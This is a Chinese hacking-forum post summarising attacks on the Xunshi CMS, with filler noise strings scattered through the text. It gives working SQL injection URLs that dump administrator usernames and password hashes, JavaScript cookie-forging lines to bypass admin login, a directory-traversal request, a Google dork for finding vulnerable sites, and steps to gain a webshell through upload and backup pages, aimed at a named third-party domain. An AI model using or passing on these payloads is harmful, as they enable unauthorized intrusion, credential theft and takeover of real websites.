中国网络渗透测试联盟

标题: 讯时漏洞总结 [打印本页]

作者: admin    时间: 2013-1-16 21:25
标题: 讯时漏洞总结
by:血封忆尘
5 m( w: Z- D: @  R8 T2 y0 j5 Q0 s& D
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
! }% ?- l2 C# \- Y4 j$ h9 x6 I& b" f
以下本文总结来自黑防去年第9期杂志上的内容...
' s4 R7 Z1 r( r
' p/ u2 H$ ?) t5 c- o/ i先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
% P0 R; y) b! N8 G8 b
7 N; i2 I) ^- @7 f. S  ]26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 7 o' j# G& F& G
1 @" Q+ \' C+ v
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
5 X) s* Z" _" a0 J$ q这里一个注入* L# n  s8 ~% U$ w1 S

/ T- ]6 Q: Q% k: Z& Z5 O" ]效果如图:
0 K. q: n6 H. ~/ n
0 Q( q' I( @( E
$ {. d/ B, E& {! s) w
/ q  @: H" O4 M4 Z6 b这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
7 ~6 d% l8 j+ v) ^# ^1 {  F/ F8 R
  W: T/ F' ]) q6 {5 Q4 \, C密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去, w4 t& K; K! n! e2 A. i

& G) |& Y  H4 v3 [- s" ejavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
6 {% s% b: e5 h1 t5 y
: R& J1 H1 f: S9 x那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:$ [. j% l3 K& y/ a4 ^2 e6 h  L+ J' |
- ?- Z* w3 `) n& N, g% Z5 A
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
; w- S: U+ d& G3 f: K) z. X& H# x% u. ^3 L" T  @
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以6 Z0 B% E7 A) {/ R
9 B3 _1 W- \* J- R8 w! B/ y
访问这页面来列目录..步骤如下:
/ T/ W& O( z+ l0 ]1 L8 ~2 c) w: [8 P) ^% M
javascript:alert(document.cookie="admindj=1")
6 b) f+ d' J5 R) T$ C* c4 B& I! s1 A
http://www.political-security.co ... asp?id=46&dir=../..
$ g! a; G. i3 w- A# ]3 Q
2 L& @: U2 d. ?: j* L1 a: ]# A: x  U效果如图:! y1 M" E& k! R' f1 X

9 R# }% T7 F3 A3 N& J* T ! k0 ~  L, |3 r+ e9 m, \; f/ e2 G

& l: P1 y& e& n5 t5 T9 s# B这样全站目录都能瞧了..找到后台目录..进去..0 @. f1 B! ?. O/ v; U+ U* M; S

/ f7 F2 k4 n- I那么进了后台怎么拿shell??上传--备份就ok了..
# N4 Z( x, ^  A( U
5 B) C  v( X! S) y+ A0 \% @那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..% U2 x% {2 J) `% p
  Y" k' s9 X4 W' M
这个我也碰到过一次..你都可以通过列目录来实现..
" A' ^4 P' p% W7 s2 j* T' ^  Z1 p3 h" i- X& D+ U* _9 I
javascript:alert(document.cookie="admindj=1")
3 N) S+ q' E7 x+ r: f& s1 H' P+ ^% r: `- R3 k; @; |
http://www.political-security.co ... p?action=BackupData 3 x6 ~1 g% F) g& z
. E0 @% d, g# J  W* H; T
备份ok..0 _: |* }$ w/ U4 l5 S7 G
& j0 @+ t8 K5 t+ p1 z+ K, o
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
  V6 V8 F+ A" O6 I& |* U! T8 j# Y, c" n/ E- [$ B
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
  Y$ O) }" m6 ?4 q
9 A; S" Z7 m7 _4 c( P1 `4 h1 \然后访问此页面进行注入..步骤如下:$ `% _' X: m$ ^6 I9 J& E' A- o

0 e, n8 W' q2 L! r9 Sjavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")3 j+ v8 r; a& w# N, L$ ]8 n6 j
/ V+ D# r2 |0 i. o& m
然后请求admin/admin_chk.asp页面
; P1 l$ t5 V/ }* r* q7 m/ r" v; D1 C" E; h* H5 s
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%7 ~% N* |! N/ l4 m/ u
: \; @% p5 O6 L* S" Z/ v" Z
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
9 x% t4 r! e. t( n: X* l& A/ V" _  ^0 _: K  e* i" X
效果如图所示:
! w$ _2 p% j6 a+ F5 S3 {
# B7 @, [% [9 V# G" S2 X3 V: g, O
) i' w! k9 U& D! k( \# f% [5 v- ]- R' {& T
讯时漏洞2% a( T& |: d% X" g+ ~
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
  P. n: M, Z3 o! o; M+ A & \/ |9 A+ W6 z& [  x
1、/admin/admin_news_pl_view.asp?id=1
5 X  [* c1 ^" a: Y3 v//id任意 填入以下语句
5 @- t( z: I8 C6 H! b& N * j- H3 J9 _! X% N
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!( @% z% {6 ^4 U' Y

8 ^8 l, Y0 n; t0 e
+ s( i/ `7 H5 ?( o6 b  K9 N
  y& V: F$ b$ B- W6 D; Z4 n3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='4 B" J' W+ F0 W7 F. y( \
8 U/ k% d; c# j! ~' o
4 k% H. V' |# R2 d; H8 N

  a9 L4 p1 ^8 e, w: u+ a. _0 r爆出管理员帐号和密码了
1 g0 k5 v/ l* C
- U: S* S: }; P; t' l7 Q, u& O/ k4 t( U# _' b/ f  h) u4 \2 k; o' v: I+ B
/ @- N# Q) i6 M: K6 G
4、cookies进后台
& y! J# C4 T1 ~% Y3 y
* A/ q# O; O# I- N; ~& kjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
& f. G: o9 Z; {! d6 o( d# L1 i
) {$ J, [4 A+ A( w$ ?
$ c2 L- k* c+ [2 u. s$ D) Y. |- [% ]: l) Q8 s8 V
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
7 a8 G- a3 g( `$ R
2 E  f' I. R+ _" W- X
  Y% U# S3 `* x; s& c1 v) W! u7 @# B9 B, M
6、后台有上传和备份取SHELL不难。( K' t3 e6 i8 X) Z2 D

# G2 ~# ?9 I9 ~, v; {7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
  R! u! K" Y* L$ _5 c$ ^; Y. K - [# m. {4 e- u- ~- \$ \
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!1 [+ a) x( M8 ?% ?0 g

* w% T9 A9 q& `$ d: e, b7 J/ w
, a* j( C- q6 |0 p5 t+ W4 b; ^7 u: R: B





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2